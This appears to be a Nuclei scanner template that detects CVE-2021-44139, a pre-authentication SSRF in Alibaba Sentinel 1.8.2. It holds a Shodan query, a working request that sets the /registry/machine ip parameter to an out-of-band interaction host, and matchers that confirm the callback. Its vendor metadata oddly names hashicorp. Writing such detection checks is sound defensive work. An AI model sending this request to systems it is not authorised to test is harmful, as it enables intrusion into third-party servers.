id: CVE-2021-44139 info: name: Alibaba Sentinel - Server-side request forgery (SSRF) author: DhiyaneshDK severity: high description: | There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter. remediation: | Apply the latest security patches or updates provided by Alibaba Sentinel to fix the SSRF vulnerability (CVE-2021-44139). reference: - https://github.com/alibaba/Sentinel/issues/2451 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-44139 cwe-id: CWE-918 epss-score: 0.01329 epss-percentile: 0.84596 cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hashicorp product: sentinel shodan-query: title:"Sentinel Dashboard" tags: cve,cve2021,ssrf,alibaba,oast,misconfig,sentinel http: - method: GET path: - "{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0" matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: word part: header words: - application/json - type: word part: body words: - '"success":true' - '"msg":"success"' condition: and # digest: 4a0a00473045022100b154a4e6c3ef9df547f7be1ea71c3ee71c632fd2f6d929328952a545a3008a9502200e232fd1522776c1c5d28da03f6ecb565d3c56c42ba2e0982ddb8ddf483c5291:922c64590222798bb761d5b6d8e72950